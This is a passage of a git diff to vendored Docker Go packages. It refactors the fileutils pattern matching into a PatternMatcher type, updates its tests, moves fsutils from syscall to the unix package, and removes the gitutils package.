-	// 2. Indicate whether we are dealing with any exception rules.
-	// 3. Error if we see a single exclusion marker on its own (!).
-	cleanedPatterns := []string{}
-	patternDirs := [][]string{}
-	exceptions := false
-	for _, pattern := range patterns {
+// NewPatternMatcher creates a new matcher object for specific patterns that can
+// be used later to match against patterns against paths
+func NewPatternMatcher(patterns []string) (*PatternMatcher, error) {
+	pm := &PatternMatcher{
+		patterns: make([]*Pattern, 0, len(patterns)),
+	}
+	for _, p := range patterns {
 		// Eliminate leading and trailing whitespace.
-		pattern = strings.TrimSpace(pattern)
-		if empty(pattern) {
+		p = strings.TrimSpace(p)
+		if p == "" {
 			continue
 		}
-		if exclusion(pattern) {
-			if len(pattern) == 1 {
-				return nil, nil, false, errors.New("Illegal exclusion pattern: !")
+		p = filepath.Clean(p)
+		newp := &Pattern{}
+		if p[0] == '!' {
+			if len(p) == 1 {
+				return nil, errors.New("illegal exclusion pattern: \"!\"")
 			}
-			exceptions = true
+			newp.exclusion = true
+			p = p[1:]
+			pm.exclusions = true
 		}
-		pattern = filepath.Clean(pattern)
-		cleanedPatterns = append(cleanedPatterns, pattern)
-		if exclusion(pattern) {
-			pattern = pattern[1:]
+		// Do some syntax checking on the pattern.
+		// filepath's Match() has some really weird rules that are inconsistent
+		// so instead of trying to dup their logic, just call Match() for its
+		// error state and if there is an error in the pattern return it.
+		// If this becomes an issue we can remove this since its really only
+		// needed in the error (syntax) case - which isn't really critical.
+		if _, err := filepath.Match(p, "."); err != nil {
+			return nil, err
 		}
-		patternDirs = append(patternDirs, strings.Split(pattern, string(os.PathSeparator)))
+		newp.cleanedPattern = p
+		newp.dirs = strings.Split(p, string(os.PathSeparator))
+		pm.patterns = append(pm.patterns, newp)
 	}
-
-	return cleanedPatterns, patternDirs, exceptions, nil
+	return pm, nil
 }
 
-// Matches returns true if file matches any of the patterns
-// and isn't excluded by any of the subsequent patterns.
-func Matches(file string, patterns []string) (bool, error) {
-	file = filepath.Clean(file)
-
-	if file == "." {
-		// Don't let them exclude everything, kind of silly.
-		return false, nil
-	}
-
-	patterns, patDirs, _, err := CleanPatterns(patterns)
-	if err != nil {
-		return false, err
-	}
-
-	return OptimizedMatches(file, patterns, patDirs)
-}
-
-// OptimizedMatches is basically the same as fileutils.Matches() but optimized for archive.go.
-// It will assume that the inputs have been preprocessed and therefore the function
-// doesn't need to do as much error checking and clean-up. This was done to avoid
-// repeating these steps on each file being checked during the archive process.
-// The more generic fileutils.Matches() can't make these assumptions.
-func OptimizedMatches(file string, patterns []string, patDirs [][]string) (bool, error) {
+// Matches matches path against all the patterns. Matches is not safe to be
+// called concurrently
+func (pm *PatternMatcher) Matches(file string) (bool, error) {
 	matched := false
 	file = filepath.FromSlash(file)
 	parentPath := filepath.Dir(file)
 	parentPathDirs := strings.Split(parentPath, string(os.PathSeparator))
 
-	for i, pattern := range patterns {
+	for _, pattern := range pm.patterns {
 		negative := false
 
-		if exclusion(pattern) {
+		if pattern.exclusion {
 			negative = true
-			pattern = pattern[1:]
 		}
 
-		match, err := regexpMatch(pattern, file)
+		match, err := pattern.match(file)
 		if err != nil {
-			return false, fmt.Errorf("Error in pattern (%s): %s", pattern, err)
+			return false, err
 		}
 
 		if !match && parentPath != "." {
 			// Check to see if the pattern matches one of our parent dirs.
-			if len(patDirs[i]) <= len(parentPathDirs) {
-				match, _ = regexpMatch(strings.Join(patDirs[i], string(os.PathSeparator)),
-					strings.Join(parentPathDirs[:len(patDirs[i])], string(os.PathSeparator)))
+			if len(pattern.dirs) <= len(parentPathDirs) {
+				match, _ = pattern.match(strings.Join(parentPathDirs[:len(pattern.dirs)], string(os.PathSeparator)))
 			}
 		}
 
@@ -120,28 +96,49 @@ func OptimizedMatches(file string, patterns []string, patDirs [][]string) (bool,
 	return matched, nil
 }
 
-// regexpMatch tries to match the logic of filepath.Match but
-// does so using regexp logic. We do this so that we can expand the
-// wildcard set to include other things, like "**" to mean any number
-// of directories.  This means that we should be backwards compatible
-// with filepath.Match(). We'll end up supporting more stuff, due to
-// the fact that we're using regexp, but that's ok - it does no harm.
-//
-// As per the comment in golangs filepath.Match, on Windows, escaping
-// is disabled. Instead, '\\' is treated as path separator.
-func regexpMatch(pattern, path string) (bool, error) {
-	regStr := "^"
+// Exclusions returns true if any of the patterns define exclusions
+func (pm *PatternMatcher) Exclusions() bool {
+	return pm.exclusions
+}
 
-	// Do some syntax checking on the pattern.
-	// filepath's Match() has some really weird rules that are inconsistent
-	// so instead of trying to dup their logic, just call Match() for its
-	// error state and if there is an error in the pattern return it.
-	// If this becomes an issue we can remove this since its really only
-	// needed in the error (syntax) case - which isn't really critical.
-	if _, err := filepath.Match(pattern, path); err != nil {
-		return false, err
+// Patterns returns array of active patterns
+func (pm *PatternMatcher) Patterns() []*Pattern {
+	return pm.patterns
+}
+
+// Pattern defines a single regexp used used to filter file paths.
+type Pattern struct {
+	cleanedPattern string
+	dirs           []string
+	regexp         *regexp.Regexp
+	exclusion      bool
+}
+
+func (p *Pattern) String() string {
+	return p.cleanedPattern
+}
+
+// Exclusion returns true if this pattern defines exclusion
+func (p *Pattern) Exclusion() bool {
+	return p.exclusion
+}
+
+func (p *Pattern) match(path string) (bool, error) {
+
+	if p.regexp == nil {
+		if err := p.compile(); err != nil {
+			return false, filepath.ErrBadPattern
+		}
 	}
 
+	b := p.regexp.MatchString(path)
+
+	return b, nil
+}
+
+func (p *Pattern) compile() error {
+	regStr := "^"
+	pattern := p.cleanedPattern
 	// Go through the pattern and convert it to a regexp.
 	// We use a scanner so we can support utf-8 chars.
 	var scan scanner.Scanner
@@ -161,17 +158,19 @@ func regexpMatch(pattern, path string) (bool, error) {
 				// is some flavor of "**"
 				scan.Next()
 
+				// Treat **/ as ** so eat the "/"
+				if string(scan.Peek()) == sl {
+					scan.Next()
+				}
+
 				if scan.Peek() == scanner.EOF {
 					// is "**EOF" - to align with .gitignore just accept all
 					regStr += ".*"
 				} else {
 					// is "**"
-					regStr += "((.*" + escSL + ")|([^" + escSL + "]*))"
-				}
-
-				// Treat **/ as ** so eat the "/"
-				if string(scan.Peek()) == sl {
-					scan.Next()
+					// Note that this allows for any # of /'s (even 0) because
+					// the .* will eat everything, even /'s
+					regStr += "(.*" + escSL + ")?"
 				}
 			} else {
 				// is "*" so map it to anything but "/"
@@ -206,14 +205,30 @@ func regexpMatch(pattern, path string) (bool, error) {
 
 	regStr += "$"
 
-	res, err := regexp.MatchString(regStr, path)
+	re, err := regexp.Compile(regStr)
+	if err != nil {
+		return err
+	}
+
+	p.regexp = re
+	return nil
+}
 
-	// Map regexp's error to filepath's so no one knows we're not using filepath
+// Matches returns true if file matches any of the patterns
+// and isn't excluded by any of the subsequent patterns.
+func Matches(file string, patterns []string) (bool, error) {
+	pm, err := NewPatternMatcher(patterns)
 	if err != nil {
-		err = filepath.ErrBadPattern
+		return false, err
+	}
+	file = filepath.Clean(file)
+
+	if file == "." {
+		// Don't let them exclude everything, kind of silly.
+		return false, nil
 	}
 
-	return res, err
+	return pm.Matches(file)
 }
 
 // CopyFile copies from src to dst until either EOF is reached
diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go
index ccd648fac3..e40cc271b3 100644
--- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go
+++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go
@@ -1,4 +1,4 @@
-package fileutils
+package fileutils // import "github.com/docker/docker/pkg/fileutils"
 
 import (
 	"os"
diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go
deleted file mode 100644
index 0f2cb7ab93..0000000000
--- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go
+++ /dev/null
@@ -1,7 +0,0 @@
-package fileutils
-
-// GetTotalUsedFds Returns the number of used File Descriptors.
-// On Solaris these limits are per process and not systemwide
-func GetTotalUsedFds() int {
-	return -1
-}
diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go
index 6df1be89bb..4b5f129a50 100644
--- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go
+++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go
@@ -1,6 +1,7 @@
-package fileutils
+package fileutils // import "github.com/docker/docker/pkg/fileutils"
 
 import (
+	"fmt"
 	"io/ioutil"
 	"os"
 	"path"
@@ -8,6 +9,9 @@ import (
 	"runtime"
 	"strings"
 	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 // CopyFile with invalid src
@@ -208,7 +212,7 @@ func TestReadSymlinkedDirectoryToFile(t *testing.T) {
 
 func TestWildcardMatches(t *testing.T) {
 	match, _ := Matches("fileutils.go", []string{"*"})
-	if match != true {
+	if !match {
 		t.Errorf("failed to get a wildcard match, got %v", match)
 	}
 }
@@ -216,7 +220,7 @@ func TestWildcardMatches(t *testing.T) {
 // A simple pattern match should return true.
 func TestPatternMatches(t *testing.T) {
 	match, _ := Matches("fileutils.go", []string{"*.go"})
-	if match != true {
+	if !match {
 		t.Errorf("failed to get a match, got %v", match)
 	}
 }
@@ -224,7 +228,7 @@ func TestPatternMatches(t *testing.T) {
 // An exclusion followed by an inclusion should return true.
 func TestExclusionPatternMatchesPatternBefore(t *testing.T) {
 	match, _ := Matches("fileutils.go", []string{"!fileutils.go", "*.go"})
-	if match != true {
+	if !match {
 		t.Errorf("failed to get true match on exclusion pattern, got %v", match)
 	}
 }
@@ -232,7 +236,7 @@ func TestExclusionPatternMatchesPatternBefore(t *testing.T) {
 // A folder pattern followed by an exception should return false.
 func TestPatternMatchesFolderExclusions(t *testing.T) {
 	match, _ := Matches("docs/README.md", []string{"docs", "!docs/README.md"})
-	if match != false {
+	if match {
 		t.Errorf("failed to get a false match on exclusion pattern, got %v", match)
 	}
 }
@@ -240,7 +244,7 @@ func TestPatternMatchesFolderExclusions(t *testing.T) {
 // A folder pattern followed by an exception should return false.
 func TestPatternMatchesFolderWithSlashExclusions(t *testing.T) {
 	match, _ := Matches("docs/README.md", []string{"docs/", "!docs/README.md"})
-	if match != false {
+	if match {
 		t.Errorf("failed to get a false match on exclusion pattern, got %v", match)
 	}
 }
@@ -248,7 +252,7 @@ func TestPatternMatchesFolderWithSlashExclusions(t *testing.T) {
 // A folder pattern followed by an exception should return false.
 func TestPatternMatchesFolderWildcardExclusions(t *testing.T) {
 	match, _ := Matches("docs/README.md", []string{"docs/*", "!docs/README.md"})
-	if match != false {
+	if match {
 		t.Errorf("failed to get a false match on exclusion pattern, got %v", match)
 	}
 }
@@ -256,7 +260,7 @@ func TestPatternMatchesFolderWildcardExclusions(t *testing.T) {
 // A pattern followed by an exclusion should return false.
 func TestExclusionPatternMatchesPatternAfter(t *testing.T) {
 	match, _ := Matches("fileutils.go", []string{"*.go", "!fileutils.go"})
-	if match != false {
+	if match {
 		t.Errorf("failed to get false match on exclusion pattern, got %v", match)
 	}
 }
@@ -264,7 +268,7 @@ func TestExclusionPatternMatchesPatternAfter(t *testing.T) {
 // A filename evaluating to . should return false.
 func TestExclusionPatternMatchesWholeDirectory(t *testing.T) {
 	match, _ := Matches(".", []string{"*.go"})
-	if match != false {
+	if match {
 		t.Errorf("failed to get false match on ., got %v", match)
 	}
 }
@@ -277,14 +281,6 @@ func TestSingleExclamationError(t *testing.T) {
 	}
 }
 
-// A string preceded with a ! should return true from Exclusion.
-func TestExclusion(t *testing.T) {
-	exclusion := exclusion("!")
-	if !exclusion {
-		t.Errorf("failed to get true for a single !, got %v", exclusion)
-	}
-}
-
 // Matches with no patterns
 func TestMatchesWithNoPatterns(t *testing.T) {
 	matches, err := Matches("/any/path/there", []string{})
@@ -307,17 +303,14 @@ func TestMatchesWithMalformedPatterns(t *testing.T) {
 	}
 }
 
-// Test lots of variants of patterns & strings
+type matchesTestCase struct {
+	pattern string
+	text    string
+	pass    bool
+}
+
 func TestMatches(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-	tests := []struct {
-		pattern string
-		text    string
-		pass    bool
-	}{
+	tests := []matchesTestCase{
 		{"**", "file", true},
 		{"**", "file/", true},
 		{"**/", "file", true}, // weird one
@@ -325,7 +318,7 @@ func TestMatches(t *testing.T) {
 		{"**", "/", true},
 		{"**/", "/", true},
 		{"**", "dir/file", true},
-		{"**/", "dir/file", false},
+		{"**/", "dir/file", true},
 		{"**", "dir/file/", true},
 		{"**/", "dir/file/", true},
 		{"**/**", "dir/file", true},
@@ -335,7 +328,7 @@ func TestMatches(t *testing.T) {
 		{"dir/**", "dir/dir2/file", true},
 		{"dir/**", "dir/dir2/file/", true},
 		{"**/dir2/*", "dir/dir2/file", true},
-		{"**/dir2/*", "dir/dir2/file/", false},
+		{"**/dir2/*", "dir/dir2/file/", true},
 		{"**/dir2/**", "dir/dir2/dir3/file", true},
 		{"**/dir2/**", "dir/dir2/dir3/file/", true},
 		{"**file", "file", true},
@@ -369,9 +362,6 @@ func TestMatches(t *testing.T) {
 		{"abc.def", "abcZdef", false},
 		{"abc?def", "abcZdef", true},
 		{"abc?def", "abcdef", false},
-		{"a\\*b", "a*b", true},
-		{"a\\", "a", false},
-		{"a\\", "a\\", false},
 		{"a\\\\", "a\\", true},
 		{"**/foo/bar", "foo/bar", true},
 		{"**/foo/bar", "dir/foo/bar", true},
@@ -379,76 +369,92 @@ func TestMatches(t *testing.T) {
 		{"abc/**", "abc", false},
 		{"abc/**", "abc/def", true},
 		{"abc/**", "abc/def/ghi", true},
+		{"**/.foo", ".foo", true},
+		{"**/.foo", "bar.foo", false},
 	}
 
-	for _, test := range tests {
-		res, _ := regexpMatch(test.pattern, test.text)
-		if res != test.pass {
-			t.Fatalf("Failed: %v - res:%v", test, res)
-		}
+	if runtime.GOOS != "windows" {
+		tests = append(tests, []matchesTestCase{
+			{"a\\*b", "a*b", true},
+			{"a\\", "a", false},
+			{"a\\", "a\\", false},
+		}...)
 	}
-}
 
-// An empty string should return true from Empty.
-func TestEmpty(t *testing.T) {
-	empty := empty("")
-	if !empty {
-		t.Errorf("failed to get true for an empty string, got %v", empty)
+	for _, test := range tests {
+		desc := fmt.Sprintf("pattern=%q text=%q", test.pattern, test.text)
+		pm, err := NewPatternMatcher([]string{test.pattern})
+		assert.NilError(t, err, desc)
+		res, _ := pm.Matches(test.text)
+		assert.Check(t, is.Equal(test.pass, res), desc)
 	}
 }
 
 func TestCleanPatterns(t *testing.T) {
-	cleaned, _, _, _ := CleanPatterns([]string{"docs", "config"})
+	patterns := []string{"docs", "config"}
+	pm, err := NewPatternMatcher(patterns)
+	if err != nil {
+		t.Fatalf("invalid pattern %v", patterns)
+	}
+	cleaned := pm.Patterns()
 	if len(cleaned) != 2 {
 		t.Errorf("expected 2 element slice, got %v", len(cleaned))
 	}
 }
 
 func TestCleanPatternsStripEmptyPatterns(t *testing.T) {
-	cleaned, _, _, _ := CleanPatterns([]string{"docs", "config", ""})
+	patterns := []string{"docs", "config", ""}
+	pm, err := NewPatternMatcher(patterns)
+	if err != nil {
+		t.Fatalf("invalid pattern %v", patterns)
+	}
+	cleaned := pm.Patterns()
 	if len(cleaned) != 2 {
 		t.Errorf("expected 2 element slice, got %v", len(cleaned))
 	}
 }
 
 func TestCleanPatternsExceptionFlag(t *testing.T) {
-	_, _, exceptions, _ := CleanPatterns([]string{"docs", "!docs/README.md"})
-	if !exceptions {
-		t.Errorf("expected exceptions to be true, got %v", exceptions)
+	patterns := []string{"docs", "!docs/README.md"}
+	pm, err := NewPatternMatcher(patterns)
+	if err != nil {
+		t.Fatalf("invalid pattern %v", patterns)
+	}
+	if !pm.Exclusions() {
+		t.Errorf("expected exceptions to be true, got %v", pm.Exclusions())
 	}
 }
 
 func TestCleanPatternsLeadingSpaceTrimmed(t *testing.T) {
-	_, _, exceptions, _ := CleanPatterns([]string{"docs", "  !docs/README.md"})
-	if !exceptions {
-		t.Errorf("expected exceptions to be true, got %v", exceptions)
+	patterns := []string{"docs", "  !docs/README.md"}
+	pm, err := NewPatternMatcher(patterns)
+	if err != nil {
+		t.Fatalf("invalid pattern %v", patterns)
+	}
+	if !pm.Exclusions() {
+		t.Errorf("expected exceptions to be true, got %v", pm.Exclusions())
 	}
 }
 
 func TestCleanPatternsTrailingSpaceTrimmed(t *testing.T) {
-	_, _, exceptions, _ := CleanPatterns([]string{"docs", "!docs/README.md  "})
-	if !exceptions {
-		t.Errorf("expected exceptions to be true, got %v", exceptions)
+	patterns := []string{"docs", "!docs/README.md  "}
+	pm, err := NewPatternMatcher(patterns)
+	if err != nil {
+		t.Fatalf("invalid pattern %v", patterns)
+	}
+	if !pm.Exclusions() {
+		t.Errorf("expected exceptions to be true, got %v", pm.Exclusions())
 	}
 }
 
 func TestCleanPatternsErrorSingleException(t *testing.T) {
-	_, _, _, err := CleanPatterns([]string{"!"})
+	patterns := []string{"!"}
+	_, err := NewPatternMatcher(patterns)
 	if err == nil {
 		t.Errorf("expected error on single exclamation point, got %v", err)
 	}
 }
 
-func TestCleanPatternsFolderSplit(t *testing.T) {
-	_, dirs, _, _ := CleanPatterns([]string{"docs/config/CONFIG.md"})
-	if dirs[0][0] != "docs" {
-		t.Errorf("expected first element in dirs slice to be docs, got %v", dirs[0][1])
-	}
-	if dirs[0][1] != "config" {
-		t.Errorf("expected first element in dirs slice to be config, got %v", dirs[0][1])
-	}
-}
-
 func TestCreateIfNotExistsDir(t *testing.T) {
 	tempFolder, err := ioutil.TempDir("", "docker-fileutils-test")
 	if err != nil {
@@ -506,7 +512,7 @@ var matchTests = []matchTest{
 	{"*c", "abc", true, nil},
 	{"a*", "a", true, nil},
 	{"a*", "abc", true, nil},
-	{"a*", "ab/c", false, nil},
+	{"a*", "ab/c", true, nil},
 	{"a*/b", "abc/b", true, nil},
 	{"a*/b", "a/c/b", false, nil},
 	{"a*b*c*d*e*/f", "axbxcxdxe/f", true, nil},
@@ -570,14 +576,14 @@ func TestMatch(t *testing.T) {
 		pattern := tt.pattern
 		s := tt.s
 		if runtime.GOOS == "windows" {
-			if strings.Index(pattern, "\\") >= 0 {
+			if strings.Contains(pattern, "\\") {
 				// no escape allowed on windows.
 				continue
 			}
 			pattern = filepath.Clean(pattern)
 			s = filepath.Clean(s)
 		}
-		ok, err := regexpMatch(pattern, s)
+		ok, err := Matches(s, []string{pattern})
 		if ok != tt.match || err != tt.err {
 			t.Fatalf("Match(%#q, %#q) = %v, %q want %v, %q", pattern, s, ok, errp(err), tt.match, errp(tt.err))
 		}
diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go
index d5c3abf568..565396f1c7 100644
--- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go
+++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go
@@ -1,13 +1,13 @@
 // +build linux freebsd
 
-package fileutils
+package fileutils // import "github.com/docker/docker/pkg/fileutils"
 
 import (
 	"fmt"
 	"io/ioutil"
 	"os"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
 )
 
 // GetTotalUsedFds Returns the number of used File Descriptors by
diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go
index 5ec21cace5..3f1ebb6567 100644
--- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go
+++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go
@@ -1,4 +1,4 @@
-package fileutils
+package fileutils // import "github.com/docker/docker/pkg/fileutils"
 
 // GetTotalUsedFds Returns the number of used File Descriptors. Not supported
 // on Windows.
diff --git a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go
index 9fd054e77f..104211adea 100644
--- a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go
+++ b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go
@@ -1,13 +1,12 @@
-// +build linux
-
-package fsutils
+package fsutils // import "github.com/docker/docker/pkg/fsutils"
 
 import (
 	"fmt"
 	"io/ioutil"
 	"os"
-	"syscall"
 	"unsafe"
+
+	"golang.org/x/sys/unix"
 )
 
 func locateDummyIfEmpty(path string) (string, error) {
@@ -23,10 +22,8 @@ func locateDummyIfEmpty(path string) (string, error) {
 		return "", err
 	}
 	name := dummyFile.Name()
-	if err = dummyFile.Close(); err != nil {
-		return name, err
-	}
-	return name, nil
+	err = dummyFile.Close()
+	return name, err
 }
 
 // SupportsDType returns whether the filesystem mounted on path supports d_type
@@ -42,9 +39,9 @@ func SupportsDType(path string) (bool, error) {
 
 	visited := 0
 	supportsDType := true
-	fn := func(ent *syscall.Dirent) bool {
+	fn := func(ent *unix.Dirent) bool {
 		visited++
-		if ent.Type == syscall.DT_UNKNOWN {
+		if ent.Type == unix.DT_UNKNOWN {
 			supportsDType = false
 			// stop iteration
 			return true
@@ -61,7 +58,7 @@ func SupportsDType(path string) (bool, error) {
 	return supportsDType, nil
 }
 
-func iterateReadDir(path string, fn func(*syscall.Dirent) bool) error {
+func iterateReadDir(path string, fn func(*unix.Dirent) bool) error {
 	d, err := os.Open(path)
 	if err != nil {
 		return err
@@ -70,7 +67,7 @@ func iterateReadDir(path string, fn func(*syscall.Dirent) bool) error {
 	fd := int(d.Fd())
 	buf := make([]byte, 4096)
 	for {
-		nbytes, err := syscall.ReadDirent(fd, buf)
+		nbytes, err := unix.ReadDirent(fd, buf)
 		if err != nil {
 			return err
 		}
@@ -78,7 +75,7 @@ func iterateReadDir(path string, fn func(*syscall.Dirent) bool) error {
 			break
 		}
 		for off := 0; off < nbytes; {
-			ent := (*syscall.Dirent)(unsafe.Pointer(&buf[off]))
+			ent := (*unix.Dirent)(unsafe.Pointer(&buf[off]))
 			if stop := fn(ent); stop {
 				return nil
 			}
diff --git a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go
index 4a648239c0..4e5a78b519 100644
--- a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go
+++ b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go
@@ -1,13 +1,14 @@
 // +build linux
 
-package fsutils
+package fsutils // import "github.com/docker/docker/pkg/fsutils"
 
 import (
 	"io/ioutil"
 	"os"
 	"os/exec"
-	"syscall"
 	"testing"
+
+	"golang.org/x/sys/unix"
 )
 
 func testSupportsDType(t *testing.T, expected bool, mkfsCommand string, mkfsArg ...string) {
@@ -53,7 +54,7 @@ func testSupportsDType(t *testing.T, expected bool, mkfsCommand string, mkfsArg
 	}
 
 	// loopback-mount the image.
-	// for ease of setting up loopback device, we use os/exec rather than syscall.Mount
+	// for ease of setting up loopback device, we use os/exec rather than unix.Mount
 	out, err = exec.Command("mount", "-o", "loop", imageFileName, mountpoint).CombinedOutput()
 	if len(out) > 0 {
 		t.Log(string(out))
@@ -62,7 +63,7 @@ func testSupportsDType(t *testing.T, expected bool, mkfsCommand string, mkfsArg
 		t.Skip("skipping the test because mount failed")
 	}
 	defer func() {
-		if err := syscall.Unmount(mountpoint, 0); err != nil {
+		if err := unix.Unmount(mountpoint, 0); err != nil {
 			t.Fatal(err)
 		}
 	}()
diff --git a/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go b/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go
deleted file mode 100644
index ded091f2a2..0000000000
--- a/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go
+++ /dev/null
@@ -1,100 +0,0 @@
-package gitutils
-
-import (
-	"fmt"
-	"io/ioutil"
-	"net/http"
-	"net/url"
-	"os"
-	"os/exec"
-	"path/filepath"
-	"strings"
-
-	"github.com/docker/docker/pkg/symlink"
-	"github.com/docker/docker/pkg/urlutil"
-)
-
-// Clone clones a repository into a newly created directory which
-// will be under "docker-build-git"
-func Clone(remoteURL string) (string, error) {
-	if !urlutil.IsGitTransport(remoteURL) {
-		remoteURL = "https://" + remoteURL
-	}
-	root, err := ioutil.TempDir("", "docker-build-git")
-	if err != nil {
-		return "", err
-	}
-
-	u, err := url.Parse(remoteURL)
-	if err != nil {
-		return "", err
-	}
-
-	fragment := u.Fragment
-	clone := cloneArgs(u, root)
-
-	if output, err := git(clone...); err != nil {
-		return "", fmt.Errorf("Error trying to use git: %s (%s)", err, output)
-	}
-
-	return checkoutGit(fragment, root)
-}
-
-func cloneArgs(remoteURL *url.URL, root string) []string {
-	args := []string{"clone", "--recursive"}
-	shallow := len(remoteURL.Fragment) == 0
-
-	if shallow && strings.HasPrefix(remoteURL.Scheme, "http") {
-		res, err := http.Head(fmt.Sprintf("%s/info/refs?service=git-upload-pack", remoteURL))
-		if err != nil || res.Header.Get("Content-Type") != "application/x-git-upload-pack-advertisement" {
-			shallow = false
-		}
-	}
-
-	if shallow {
-		args = append(args, "--depth", "1")
-	}
-
-	if remoteURL.Fragment != "" {
-		remoteURL.Fragment = ""
-	}
-
-	return append(args, remoteURL.String(), root)
-}
-
-func checkoutGit(fragment, root string) (string, error) {
-	refAndDir := strings.SplitN(fragment, ":", 2)
-
-	if len(refAndDir[0]) != 0 {
-		if output, err := gitWithinDir(root, "checkout", refAndDir[0]); err != nil {
-			return "", fmt.Errorf("Error trying to use git: %s (%s)", err, output)
-		}
-	}
-
-	if len(refAndDir) > 1 && len(refAndDir[1]) != 0 {
-		newCtx, err := symlink.FollowSymlinkInScope(filepath.Join(root, refAndDir[1]), root)
-		if err != nil {
-			return "", fmt.Errorf("Error setting git context, %q not within git root: %s", refAndDir[1], err)
-		}
-
-		fi, err := os.Stat(newCtx)
-		if err != nil {
-			return "", err
-		}
-		if !fi.IsDir() {
-			return "", fmt.Errorf("Error setting git context, not a directory: %s", newCtx)
-		}
-		root = newCtx
-	}
-
-	return root, nil
-}
-
-func gitWithinDir(dir string, args ...string) ([]byte, error) {
-	a := []string{"--work-tree", dir, "--git-dir", filepath.Join(dir, ".git")}
-	return git(append(a, args...)...)
-}
-
-func git(args ...string) ([]byte, error) {
-	return exec.Command("git", args...).CombinedOutput()
-}
diff --git a/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go b/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go
deleted file mode 100644
index d197058d20..0000000000
--- a/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go
+++ /dev/null
@@ -1,220 +0,0 @@
-package gitutils
-
-import (
-	"fmt"
-	"io/ioutil"
-	"net/http"
-	"net/http/httptest"
-	"net/url"
-	"os"
-	"path/filepath"
-	"reflect"
-	"runtime"
-	"strings"
-	"testing"
-)
-
-func TestCloneArgsSmartHttp(t *testing.T) {
-	mux := http.NewServeMux()
-	server := httptest.NewServer(mux)
-	serverURL, _ := url.Parse(server.URL)
-
-	serverURL.Path = "/repo.git"
-	gitURL := serverURL.String()
-
-	mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) {
-		q := r.URL.Query().Get("service")
-		w.Header().Set("Content-Type", fmt.Sprintf("application/x-%s-advertisement", q))
-	})
-
-	args := cloneArgs(serverURL, "/tmp")
-	exp := []string{"clone", "--recursive", "--depth", "1", gitURL, "/tmp"}
-	if !reflect.DeepEqual(args, exp) {
-		t.Fatalf("Expected %v, got %v", exp, args)
-	}
-}
-
-func TestCloneArgsDumbHttp(t *testing.T) {
-	mux := http.NewServeMux()
-	server := httptest.NewServer(mux)
-	serverURL, _ := url.Parse(server.URL)
-
-	serverURL.Path = "/repo.git"
-	gitURL := serverURL.String()
-
-	mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) {
-		w.Header().Set("Content-Type", "text/plain")
-	})
-
-	args := cloneArgs(serverURL, "/tmp")
-	exp := []string{"clone", "--recursive", gitURL, "/tmp"}
-	if !reflect.DeepEqual(args, exp) {
-		t.Fatalf("Expected %v, got %v", exp, args)
-	}
-}
-
-func TestCloneArgsGit(t *testing.T) {
-	u, _ := url.Parse("git://github.com/docker/docker")
-	args := cloneArgs(u, "/tmp")
-	exp := []string{"clone", "--recursive", "--depth", "1", "git://github.com/docker/docker", "/tmp"}
-	if !reflect.DeepEqual(args, exp) {
-		t.Fatalf("Expected %v, got %v", exp, args)
-	}
-}
-
-func TestCloneArgsStripFragment(t *testing.T) {
-	u, _ := url.Parse("git://github.com/docker/docker#test")
-	args := cloneArgs(u, "/tmp")
-	exp := []string{"clone", "--recursive", "git://github.com/docker/docker", "/tmp"}
-	if !reflect.DeepEqual(args, exp) {
-		t.Fatalf("Expected %v, got %v", exp, args)
-	}
-}
-
-func gitGetConfig(name string) string {
-	b, err := git([]string{"config", "--get", name}...)
-	if err != nil {
-		// since we are interested in empty or non empty string,
-		// we can safely ignore the err here.
-		return ""
-	}
-	return strings.TrimSpace(string(b))
-}
-
-func TestCheckoutGit(t *testing.T) {
-	root, err := ioutil.TempDir("", "docker-build-git-checkout")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(root)
-
-	autocrlf := gitGetConfig("core.autocrlf")
-	if !(autocrlf == "true" || autocrlf == "false" ||
-		autocrlf == "input" || autocrlf == "") {
-		t.Logf("unknown core.autocrlf value: \"%s\"", autocrlf)
-	}
-	eol := "\n"
-	if autocrlf == "true" {
-		eol = "\r\n"
-	}
-
-	gitDir := filepath.Join(root, "repo")
-	_, err = git("init", gitDir)
-	if err != nil {
-		t.Fatal(err)
-	}
-
